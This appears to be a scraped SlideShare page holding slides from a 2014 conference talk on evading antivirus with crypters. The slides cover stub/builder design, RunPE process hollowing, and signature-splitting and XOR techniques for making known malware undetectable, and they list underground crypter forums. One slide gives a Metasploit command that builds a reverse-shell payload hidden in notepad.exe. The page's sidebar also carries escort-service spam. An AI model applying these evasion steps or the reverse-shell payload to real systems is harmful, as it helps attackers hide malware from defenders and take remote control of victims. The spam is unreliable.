Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit BasicsNetwork Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
 
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon YangPractical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
 
Micro_Controllers_lab1_Intro_to_Arduino.pptx
Micro_Controllers_lab1_Intro_to_Arduino.pptxMicro_Controllers_lab1_Intro_to_Arduino.pptx
Micro_Controllers_lab1_Intro_to_Arduino.pptx
 
Emulating With JavaScript
Emulating With JavaScriptEmulating With JavaScript
Emulating With JavaScript
 
arduino-ppt
arduino-ppt arduino-ppt
arduino-ppt
 
Arduino
ArduinoArduino
Arduino
 
Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'
 
Advanced SOHO Router Exploitation XCON
Advanced SOHO Router Exploitation XCONAdvanced SOHO Router Exploitation XCON
Advanced SOHO Router Exploitation XCON
 
Practical reverse engineering and exploit development for AVR-based Embedded ...
Practical reverse engineering and exploit development for AVR-based Embedded ...Practical reverse engineering and exploit development for AVR-based Embedded ...
Practical reverse engineering and exploit development for AVR-based Embedded ...
 
Stealing from Thieves: Breaking IonCUBE VM to RE Exploit Kits
Stealing from Thieves: Breaking IonCUBE VM to RE Exploit KitsStealing from Thieves: Breaking IonCUBE VM to RE Exploit Kits
Stealing from Thieves: Breaking IonCUBE VM to RE Exploit Kits
 
One Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform ExploitationOne Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform Exploitation
 
CNIT 126 13: Data Encoding
CNIT 126 13: Data EncodingCNIT 126 13: Data Encoding
CNIT 126 13: Data Encoding
 
Dino2 - the Amazing Evolution of the VA Smalltalk Virtual Machine
Dino2 - the Amazing Evolution of the VA Smalltalk Virtual MachineDino2 - the Amazing Evolution of the VA Smalltalk Virtual Machine
Dino2 - the Amazing Evolution of the VA Smalltalk Virtual Machine
 
Sista: Improving Cog’s JIT performance
Sista: Improving Cog’s JIT performanceSista: Improving Cog’s JIT performance
Sista: Improving Cog’s JIT performance
 
SPARKNaCl: A verified, fast cryptographic library
SPARKNaCl: A verified, fast cryptographic librarySPARKNaCl: A verified, fast cryptographic library
SPARKNaCl: A verified, fast cryptographic library
 
Shameful secrets of proprietary network protocols
Shameful secrets of proprietary network protocolsShameful secrets of proprietary network protocols
Shameful secrets of proprietary network protocols
 
idsecconf2010-hacking priv8 network
idsecconf2010-hacking priv8 networkidsecconf2010-hacking priv8 network
idsecconf2010-hacking priv8 network
 
y3dips hacking priv8 network
y3dips hacking priv8 networky3dips hacking priv8 network
y3dips hacking priv8 network
 

Dernier

Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
Enterprise Knowledge
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
Delhi Call girls
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
Enterprise Knowledge
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
giselly40
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
vu2urc
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
Earley Information Science
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
Safe Software
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
Delhi Call girls
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc
 

Dernier (20)

Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 

AntiVirus Evasion Techniques Use of Crypters 2k14 at MundoHackerDay

  • 1. AntiVirus Evasion: Use of Crypters Abraham Pasamar - INCIDE - #mundohackerday - 29.04.14
  • 2. Whoami ncd:~ apasamar$ whoami apasamar apasamar@incide.es @apasamar a.k.a brajan ncd:~ apasamar$ cat apasamar.cv Electrical Engineer and Master in Information Security Co-founder of INCIDE: Electronic Evidence Experts Forensics / Expert Witness Reports Incident Response IT Security Auditors and Colsultants ! ncd:~ apasamar$ rm apasamar.cv
  • 3. what is this about... • Introduction • AV’s how they work • Malware types and AV detection • Evasion techniques • Auto-encryption, Polymorfism, Ofuscation, Compresion • Crypters • types • stub • stub FUD • Modding techniques • Resources
  • 4. introduction • MALWARE = $$$$$$$$$ • BOTNETS, APT, RANSOMWARE • Empresas AV’s —> Detectar MALWARE • Malos: INDETECTAR MALWARE
  • 5. introduction • MALWARE = $$$$$$$$$ • BOTNETS, APT, RANSOMWARE • AV Companies —> MALWARE Detection • BAD GUYS: Undetect MALWARE
  • 8. AV howto • AntiVirus scan binaries on HARD DISC • They do not SCAN MEMORY, only binaries that ‘start’ the running processes • Scan for signatures: binary sequences @ AV DataBase • Look for malicious tecniques (Heuristics):API’s, functions, XOR, etc • Sandbox (partial execution):look for decryption routines, etc
  • 10. AV howto • AV analysis process: Atacs
  • 11. AV howto • Recomended: “Abusing File Processing in Malware Detectors for Fun and Profit” (2012) Suman Jana and Vitaly Shmatikov The University of Texas at Austin
  • 12. AV howto • Metasploit Framework (Rapid7) • Community Edition: • msfpayload windows/shell/ reverse_tcp LHOST=192.168.1.75 LPORT=4444 R | msfencode -c 5 -e x86/shikata_ga_nai -x notepad.exe > notepad2.exe • Pro Edition: • Generate AV-evading Dynamic Payloads
  • 13. types of malware and AV detection • Comercial SPY Programms: (white list, signed) • e-blaster • 007 • perfect keylogger • …
  • 14. • Malware newly created: • LOW detection (NO known signatures) • possible heuristic detections types of malware and AV detection
  • 15. • Existing Malware: (very well known, signature and heuristic detections) • trojans (BiFrost, PoisonIvy,CyberGate, SpyNet, Darkcomet) • downloaders • passwords stealers • reverse shells types of malware and AV detection
  • 16. How can we make undetectable malware already detected by AV? • C r y p t e r s: • Software allows you to encrypt ANY MALWARE doing it undetectable to AV.
  • 18. builder / stub • Builder: • Is responsible for creating the NEW EXEcutable, composed of the STUB and the ENCRYPTED MALWARE • Stub: • Its mission is to decrypt and run the ENCRYPTED MALWARE
  • 19. ! ! ! ! ! ! ! ! ! CRYPTER + STUB STUB DETECTED MALWARE ENCRYPTED MALWARE STUB CRYPTER (Builder) XOR, RC4, ... exe dll resource builder / stub
  • 20. STUB CRYPTED MALWARE STUB CRYPTED MALWAREKEY splitter splitter A resource section can always be used builder / stub
  • 21. • Crypters types: • ScanTime • RunTime builder / stub
  • 22. • ScanTime STUB CRYPTED MALWARE DETECTED MALWARE HARD DISC AV stub
  • 23. • RunTime STUB ENCRYPTED MALWARE HARD DISC RAM DETECTEDMALWARE AV stub
  • 24. • STUB modules: • Decrypt Routine • RunPe (Dynamic Forking) Routine ! stub
  • 25. RunPE o Dynamic Forking CreateProcess PROCESs 1 (CREATE_SUSPENDED) GetThreadContext PEB EBX EAX BaseAddress 1 EP I +8 PROCESS 2 ReadFile WriteProcessMemoryEP 2 BaseAddress 2 SetThreadContextResumeThread
  • 26. FUD • Target: FUD Stub (Full UnDetectable) • From Source Code • From Binary Code • ¿How? • MODDING
  • 27. modding source code • Manually or using obfuscation tools: • Function replacement (SPLIT,..) • Funciones/strings/variables replacement and ofuscation. Use of rot13 or Hex encoding • Encrytion: RC4 and XOR are very well known by AV • Alternatives:TEA, DES, etc • Alternative RunPE Routines • Fake APIs • TLB (Tab Library File) • Trash code
  • 28. • Techniques: • Dsplit/AvFucker • SignatureFucker • Hexing • RIT • XOR and variants • Tips modding binary file
  • 29. • We have to Undetect STUB, BUILDER is only a tool used at home, not in the wild • First of all is to FIND AV SIGNATURES: • Simple Signatures • Multiple Signatures • Heuristic Signatures modding binary file
  • 30. • Recomended: “Bypassing Anti-Virus Scanners” (2012) InterNOT Security Team modding binary file
  • 31. • ¿What if we use a simple Encrytion/Decrytion rutine inside the STUB? stub.exe EP Signatures stub.exe OLD EP Signatures NEW EP Encrypted Decrytion Rutine modding binary file
  • 32. • ORIGINAL STUB MULTIPLE AV SCAN modding binary file Do NOT use VirusTotal for these Scans or your STUB samples will be send to AV Companies :(
  • 33. • ENCRYPTION ROUTINE • NEW EP • INSERT ROUTINE • .text SECTION • from offset 1050 • to Import Table modding binary file
  • 34. • ENCRYPTION ROUTINE AT NEW EP • used only to encrypt .text section (used once) Set breakpoint here, after encryption routine modding binary file
  • 35. • DECRYPTION AND EXECUTION AN NEW EP modding binary file
  • 36. • MODIFIED STUB MULTIPLE AV SCAN 16 AV’s KO modding binary file
  • 37. modding binary file • Techniques: • Dsplit/AvFucker • SignatureFucker • Hexing • RIT • XOR and variants • Tips
  • 38. • DSplit: Header EXE body Header EXE body 1000 bytes Header EXE body 2000 bytes Header EXE body 3000 bytes Header EXE body ··· Nx1000 bytes modding binary file
  • 39. • AvFucker: EXE bodyHeader 0000000000 1000 bytes Header EXE body0000000000 1000 bytes Header Cuerpo EXE0000000000 1000 bytes Header EXE body ··· 0000000000 1000 bytes modding binary file Header EXE body
  • 40. • RIT Technique • Find out AV Signature • If Signture is located at instructions code —> break flow • jump to another address (hole in section where yo can write your code) • Execute pending instrucionts • Return/jump to the appropriate instrucion modding binary file
  • 41. • XOR Tecnique • Find out AV Signature • Apply to a byte XOR with any value i.e. 22 • Modify EP or jump to your hole • Apply XOR 22 to the modified byte • Return/jump to the appropriate instrucion modding binary file
  • 42. Detected bytes (EP): XOR of the detected bytes: New EP ( XORs and jump to original EP): modding binary file
  • 43. other techniques • Add Fake APIs • Hex strings edit • Move/change function calls • Change funtion call type: by name/by offset • Insert detected dll function into Stub Code !
  • 44. resources • http://www.indetectables.net • http://www.udtools.net • http://www.masters-hackers.info • http://www.level-23.biz/ • http://www.corp-51.net/ • http://www.underc0de.org !
  • 45. Avda. Diagonal, 640 6ª Planta 08017 Barcelona (Spain) info@incide.es http://www.incide.es http://www.twitter.com/1NC1D3 http://www.atrapadosporlosbits.com http://www.youtube.com/incidetube Companies > INCIDE - Investigación Digital Tel./Fax. +34 932 546 277 / +34 932 546 314 A NY Q U E S T I O N S ?